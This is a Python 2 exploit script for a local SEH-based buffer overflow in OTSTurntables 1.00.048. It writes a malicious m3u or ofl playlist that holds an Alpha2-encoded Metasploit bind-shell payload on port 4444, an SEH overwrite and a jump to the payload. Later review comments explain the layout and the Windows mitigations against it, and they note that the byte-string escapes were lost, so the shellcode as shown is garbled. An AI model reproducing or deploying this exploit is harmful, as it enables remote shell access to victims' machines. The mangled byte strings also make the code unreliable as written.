
# Title : OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)
# Published : 2010-11-28
# Author : 0v3r


# Exploit Title: OTSTurntables 1.00.028 (m3u/ofl) Local BOF Exploit (SEH)
# Date: 11/24/2010
# Author: 0v3r
# Software Link: http://www.otsturntables.com/download-otsturntables-free/
# Version: 1.00.048
# Tested on: Windows XP SP3 EN
# CVE: N/A

#!/usr/bin/python

import sys

# Payload that gets embedded in the crafted playlist file. The line below is
# the original author's generator note (a Metasploit Alpha2-encoded bind-shell
# payload, 696 bytes as stated there); nothing in this script decodes or runs
# it, the string is only concatenated into `buff` further down.
# NOTE(review): the `\x` escapes are not visible in this rendering, so
# len(shellcode) here is the length of the ASCII text rather than the byte
# count the author's size arithmetic below assumes.
# Defender's view: an Alpha2-encoded payload is largely alphanumeric by design,
# so a printable-character filter on playlist entries will not reject it;
# per-entry length limits in the parser are the relevant hardening for this
# bug class.
# win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode = ("xebx03x59xebx05xe8xf8xffxffxffx49x48x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax4a"
"x58x50x30x42x30x42x6bx42x41x5ax32x42x42x42x32x41"
"x42x41x30x41x41x58x50x38x42x42x75x4bx59x4bx4cx30"
"x6ax58x6bx52x6dx6dx38x38x79x39x6fx4bx4fx39x6fx75"
"x30x6ex6bx32x4cx71x34x34x64x6ex6bx31x55x37x4cx6e"
"x6bx33x4cx55x55x53x48x57x71x68x6fx6cx4bx50x4fx47"
"x68x6ex6bx53x6fx47x50x56x61x7ax4bx72x69x6ex6bx36"
"x54x4ex6bx63x31x38x6ex37x41x6bx70x4fx69x6cx6cx4b"
"x34x4bx70x52x54x64x47x6fx31x4bx7ax34x4dx46x61x59"
"x52x48x6bx5ax54x65x6bx73x64x41x34x77x58x74x35x6b"
"x55x4ex6bx61x4fx57x54x75x51x58x6bx70x66x6cx4bx36"
"x6cx42x6bx6ex6bx31x4fx67x6cx46x61x7ax4bx63x33x66"
"x4cx6cx4bx6cx49x50x6cx66x44x47x6cx53x51x6fx33x64"
"x71x4bx6bx41x74x4ex6bx63x73x56x50x6cx4bx63x70x76"
"x6cx6cx4bx52x50x67x6cx6cx6dx4cx4bx57x30x43x38x33"
"x6ex53x58x4cx4ex30x4ex76x6ex7ax4cx32x70x4bx4fx78"
"x56x62x46x66x33x61x76x75x38x66x53x36x52x75x38x71"
"x67x32x53x45x62x63x6fx56x34x6bx4fx6ex30x70x68x58"
"x4bx48x6dx4bx4cx35x6bx46x30x6bx4fx38x56x53x6fx4f"
"x79x6bx55x50x66x6ex61x48x6dx76x68x37x72x73x65x41"
"x7ax45x52x79x6fx38x50x30x68x4bx69x34x49x49x65x6e"
"x4dx66x37x6bx4fx7ax76x50x53x46x33x36x33x42x73x46"
"x33x57x33x50x53x41x53x32x73x6bx4fx4ex30x75x36x31"
"x78x77x61x73x6cx52x46x43x63x6dx59x58x61x4cx55x52"
"x48x4fx54x54x5ax50x70x4fx37x61x47x4bx4fx4ex36x30"
"x6ax76x70x73x61x71x45x39x6fx6ex30x30x68x69x34x6c"
"x6dx76x4ex49x79x66x37x79x6fx6bx66x63x63x42x75x59"
"x6fx7ax70x41x78x4dx35x57x39x6cx46x57x39x42x77x59"
"x6fx68x56x52x70x31x44x51x44x46x35x4bx4fx78x50x4e"
"x73x50x68x58x67x44x39x48x46x30x79x41x47x6bx4fx59"
"x46x51x45x6bx4fx6ex30x75x36x50x6ax70x64x32x46x62"
"x48x52x43x50x6dx6dx59x4dx35x63x5ax52x70x32x79x65"
"x79x38x4cx4fx79x69x77x30x6ax62x64x4bx39x6bx52x30"
"x31x4fx30x6ax53x6cx6ax39x6ex43x72x74x6dx59x6ex71"
"x52x74x6cx6fx63x4cx4dx50x7ax50x38x6cx6bx4ex4bx6c"
"x6bx33x58x33x42x59x6ex6fx43x45x46x39x6fx53x45x50"
"x44x79x6fx79x46x63x6bx50x57x71x42x71x41x70x51x50"
"x51x33x5ax74x41x42x71x32x71x76x35x30x51x69x6fx7a"
"x70x72x48x4ex4dx6ax79x53x35x6ax6ex30x53x79x6fx5a"
"x76x30x6ax6bx4fx39x6fx65x67x6bx4fx5ax70x6ex6bx72"
"x77x59x6cx6bx33x7ax64x70x64x49x6fx7ax76x76x32x6b"
"x4fx5ax70x30x68x6cx30x6fx7ax57x74x73x6fx73x63x6b"
"x4fx38x56x4bx4fx4ex30x4a")


# Alpha2-encoded variant of the near jump (per the original comment below).
# NOTE: this binding is dead code — `jump` is rebound to a raw five-byte near
# jump before `buff` is assembled, so the encoded form never reaches the
# output file.
# near jump 928 bytes encoded with Alpha2 encoder
jump = ("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x37x49x49x49x51x5ax6ax65"
"x58x50x30x41x31x41x42x6bx41x41x75x41x32x41x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x38x69x49x79x55"
"x30x79x6cx4bx4fx4bx4fx65")

# Layout of the crafted file. The overflow overwrites a structured exception
# handler record: `nseh` is the overwritten next-SEH pointer (a short jump) and
# `seh` the handler address, which the original comment places at a ppr
# (pop/pop/ret) sequence in msacm32.drv. Control then passes through `nopsled`
# into `jump`, a near jump whose rel32 is the 928-byte backward displacement
# the encoded-jump comment above names, presumably landing in `shellcode`.
# `junk` pads junk + shellcode to 912 characters (len(shellcode) is computed
# over the rendered text, where the `\x` escapes are missing), which places
# nseh/seh at the SEH record; `stuff` is trailing filler after the jump.
# NOTE(review): the hard-coded handler address ties this file to the exact
# msacm32.drv build on the stated test platform (Windows XP SP3 EN). SafeSEH,
# SEHOP and DEP are the Windows mitigations for this pattern, and an
# ASLR-randomised module base invalidates the address outright.
nopsled  = "x90" * 16
junk     = "x90" * (912 - len(shellcode)) 
nseh     = "xebx06x90x90"	           # short jump
seh      = "x3fx28xd1x72"		   # 0x72D1283F - ppr - msacm32.drv
jump     = "xe9x60xfcxffxff"	   # near jump (rebinds the encoded `jump` above)
stuff	 = "x44" * 10000 

buff = junk + shellcode + nseh + seh + nopsled + jump + stuff



# Script body (Python 2 `print` statement syntax throughout). Picks an output
# filename from the single command-line option and writes `buff` to it; the
# wide try/except turns every failure into a one-line message.
try:	
	# Banner. NOTE(review): `"n"` is presumably a newline whose backslash was
	# lost in rendering, as with the byte strings above.
 	print "n"	
	print "---------------------------------------------------------------------------------"
	print "|          OTSTurntables 1.00.048 (m3u/ofl) Local BOF Exploit (SEH)            |"
	print "---------------------------------------------------------------------------------"
	print "n"
	
	# Exactly one argument is expected; otherwise print usage and leave via
	# SystemExit, which is caught below so the bare except does not report it
	# as a write failure.
	if len(sys.argv)!=2:
	
     	  	print "Usage: exploit.py <option>n"
		print "File type options:"
		print "[1] m3u file"
		print "[2] ofl file"
      	 	sys.exit(0)


	# Option -> filename. int() on a non-numeric option raises ValueError,
	# handled by the dedicated except clause below.
	if int(sys.argv[1]) == 1: 
		fname = "exploit.m3u"	
	elif int(sys.argv[1]) == 2 :
		fname = "exploit.ofl"
	else:	
		print "Check again the available options!"
		sys.exit(0)
	
	# Write the crafted buffer into the working directory (mode 'w'); the
	# handle is closed explicitly rather than via a `with` block.
	f = open(fname,'w')
	f.write(buff)
	f.close()
 
	print "- File ",fname," created..."
	# NOTE: the version quoted in this message (1.00.028) differs from the
	# 1.00.048 in the header; the page itself uses both.
	print "- To run exploit open OTSTurntables 1.00.028 and import the file",fname 
except SystemExit:
	pass
except ValueError:
	print "Check again the available options!"
except:
	# Bare except: any other error (typically open()/write() failing) is
	# reported with this message and its details discarded.
	print "-Oooops! Can't write file...n"